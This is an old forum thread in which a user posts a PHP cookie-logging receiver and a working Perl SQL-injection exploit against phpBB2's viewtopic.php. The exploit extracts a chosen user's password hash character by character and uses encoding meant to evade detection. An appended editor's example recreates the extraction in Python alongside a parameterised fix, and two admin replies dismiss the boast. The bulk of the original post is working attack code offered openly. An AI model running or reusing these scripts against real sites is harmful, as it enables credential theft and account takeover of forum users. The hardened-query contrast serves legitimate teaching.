
Your forums need to be updated.

(@anonymous)
Trusted Member

I have been able to gain admin access! Here is your vulnerability:
Remote Cookie Stealing:
<?php
// Appends the cookie handed in through the "c" query parameter, together with
// the requester's IP, the time and the referring page, to cookies.txt
$cookie  = $_GET['c'];
$ip      = getenv('REMOTE_ADDR');
$date    = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: ' . $cookie . '<br> IP: ' . $ip . '<br> Date and Time: ' . $date . '<br> Referer: ' . $referer . '<br><br><br>');
fclose($fp);
?>
Stealing of md5 hashes through viewtopic.php:
if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
{
    $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if ( isset($HTTP_GET_VARS['topic']) )
{
    $topic_id = intval($HTTP_GET_VARS['topic']);
}
Now, if GET['view']=newest and GET['sid'] is set, this query gets executed:
$sql = "SELECT p.post_id
    FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
    WHERE s.session_id = '$session_id'
        AND u.user_id = s.session_user_id
        AND p.topic_id = $topic_id
        AND p.post_time >= u.user_lastvisit
    ORDER BY p.post_time ASC
    LIMIT 1";
Now for the actual hack:
#!/usr/bin/perl
# Pulls the 32-character password hash of user $uid one character per request:
# the injected UNION makes ord() of one hash character the only post_id the
# view=newest query returns, and phpBB echoes that number back in its
# "Location: viewtopic.php?p=<num>#<num>" redirect.
use IO::Socket;

$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;
$dbtype = 'mysql4'; # mysql4 or pgsql
print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";
$p = "";
for ($index = 1; $index <= 32; $index++)
{
    $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                    PeerPort => $port,
                                    Proto => "tcp",
                                    Type => SOCK_STREAM)
        or die "Couldn't connect to $remote:$port : $@\n";
    # topic_id=-1 empties the real SELECT; the appended UNION supplies the row
    $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) .
           "&view=newest" . " HTTP/1.0\n";
    print $socket $str;
    print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
    print $socket "Host: $remote\n\n";           # blank line terminates the request headers
    while ($answer = <$socket>)
    {
        if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
        {
            $p .= chr($1);
        }
    }
    close($socket);
}
print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
    my $str = shift;
    my $ret = "";
    for (my $i = 0; $i < length($str); $i++)
    {
        my $c = substr($str, $i, 1);
        my $j = rand(length($str)) * 1000;
        # spaces are always percent-encoded, every other character at random
        if (int($j) % 2 || $c eq ' ')
        {
            $ret .= "%" . sprintf("%02x", ord($c));
        }
        else
        {
            $ret .= $c;
        }
    }
    return $ret;
}

sub make_dbsql
{
    if ($dbtype eq 'mysql4')
    {
        # the trailing /* comments out phpBB's ORDER BY and LIMIT
        return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*";
    }
    elsif ($dbtype eq 'pgsql')
    {
        return ";
select ascii(substring(user_password from $index for 1)) as
post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
    }
    else
    {
        return "";
    }
}

This is another script that will give a normal user admin rights. I won't post it though. I wouldn't want your precious forums, which your loving admin, ReT, has worked so hard to build, to be destroyed.
-Love Acid_Rain

Topic starter Posted : 09/06/2006 4:43 am
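Added example (the editor's, not code from the post above and not phpBB's own): the hash-extraction trick from the viewtopic.php snippet and the Perl script, run end to end in Python against an in-memory SQLite stand-in for the phpBB tables. Note what the snippet implies: both intval() branches fire only for the t= and topic= parameters, while the exploit sends topic_id=, so the $topic_id that reaches the view=newest query must be arriving some other way. On PHP installs of that era with register_globals enabled, a GET parameter named topic_id becomes $topic_id directly and unsanitised, which is what vulnerable_viewtopic() below models. The injected UNION turns the single post_id the query returns into ord() of one hash character, phpBB hands it back in the Location: redirect as viewtopic.php?p=<n>#<n>, and 32 requests yield the 32-character hash. The table layouts, the user row holding md5("password") as its stored hash, the function names, and SQLite's unicode()/substr() and "-- " in place of MySQL's ord()/substring() and "/*" are all assumptions of this example. hardened_viewtopic() is the same query with the topic id cast to an integer and bound as a parameter, which is the fix.

```python
import re
import sqlite3

# Constructed sample data for this example (not from the original post):
# user 2 stores a 32-char MD5-style hash; md5("password") is used as the value.
SAMPLE_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


def make_db():
    """Build an in-memory stand-in for the three phpBB tables the query joins."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE phpbb_users    (user_id INTEGER, user_password TEXT, user_lastvisit INTEGER);
        CREATE TABLE phpbb_posts    (post_id INTEGER, topic_id INTEGER, post_time INTEGER);
        CREATE TABLE phpbb_sessions (session_id TEXT, session_user_id INTEGER);
    """)
    db.execute("INSERT INTO phpbb_users VALUES (2, ?, 0)", (SAMPLE_HASH,))
    db.execute("INSERT INTO phpbb_posts VALUES (17, 5, 100)")
    db.execute("INSERT INTO phpbb_sessions VALUES ('1', 2)")
    return db


def redirect_for(row):
    """phpBB answers view=newest with a redirect to the post it found."""
    if row is None:
        return None
    return f"Location: viewtopic.php?p={row[0]}#{row[0]}"


def vulnerable_viewtopic(db, topic_id_param, session_id="1"):
    """The view=newest query with $topic_id interpolated straight from the
    request (the register_globals path: no intval(), no quoting)."""
    sql = ("SELECT p.post_id FROM phpbb_posts p, phpbb_sessions s, phpbb_users u "
           f"WHERE s.session_id = '{session_id}' AND u.user_id = s.session_user_id "
           f"AND p.topic_id = {topic_id_param} AND p.post_time >= u.user_lastvisit "
           "ORDER BY p.post_time ASC LIMIT 1")
    return redirect_for(db.execute(sql).fetchone())


def hardened_viewtopic(db, topic_id_param, session_id="1"):
    """Same query, fixed: cast the id to an integer and bind both values."""
    try:
        topic_id = int(topic_id_param)
    except ValueError:
        topic_id = 0   # PHP's intval() would keep leading digits; either way the SQL text is gone
    sql = ("SELECT p.post_id FROM phpbb_posts p, phpbb_sessions s, phpbb_users u "
           "WHERE s.session_id = ? AND u.user_id = s.session_user_id "
           "AND p.topic_id = ? AND p.post_time >= u.user_lastvisit "
           "ORDER BY p.post_time ASC LIMIT 1")
    return redirect_for(db.execute(sql, (session_id, topic_id)).fetchone())


def union_payload(index, uid):
    """One character of user `uid`'s hash, returned as the only post_id.
    -1 empties the real SELECT; "-- " drops phpBB's ORDER BY/LIMIT the way the
    post's "/*" does in MySQL; unicode()/substr() are SQLite's ord()/substring()."""
    return (f"-1 union select unicode(substr(user_password,{index},1)) "
            f"from phpbb_users where user_id={uid} -- ")


def extract_hash(viewtopic, db, uid=2, length=32):
    """Client side of the Perl script: one request per character, read the
    number after '#' in the Location header, turn it back into a character."""
    recovered = ""
    for index in range(1, length + 1):
        location = viewtopic(db, union_payload(index, uid)) or ""
        m = re.search(r"#(\d+)", location)
        if not m:
            break                      # the page did not leak a post number
        recovered += chr(int(m.group(1)))
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_hash(vulnerable_viewtopic, db))
    print("hardened:  ", repr(extract_hash(hardened_viewtopic, db)))
```

Against the vulnerable function the loop recovers the full stored hash; against the hardened one the first payload fails the integer cast, no post number comes back, and the loop stops with nothing. The request-line and percent-encoding details of the Perl script are left out here because the stand-in calls the query function directly rather than speaking HTTP.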
(@eah_xxheretikxx)
Noble Member

lol TDH, always seeking to impress, no? I see no proof you gained access to admin. πŸ˜‰

You didn't fool me for a sec. πŸ˜‰

ReT

ruthless deeds return to harass their architect

Posted : 09/06/2006 3:22 pm
(@eah_xxheretikxx)
Noble Member

Oh yeah - cool script. Too bad it's for a version of phpBB released 3 years ago. πŸ™‚

ruthless deeds return to harass their architect

Posted : 09/06/2006 3:26 pm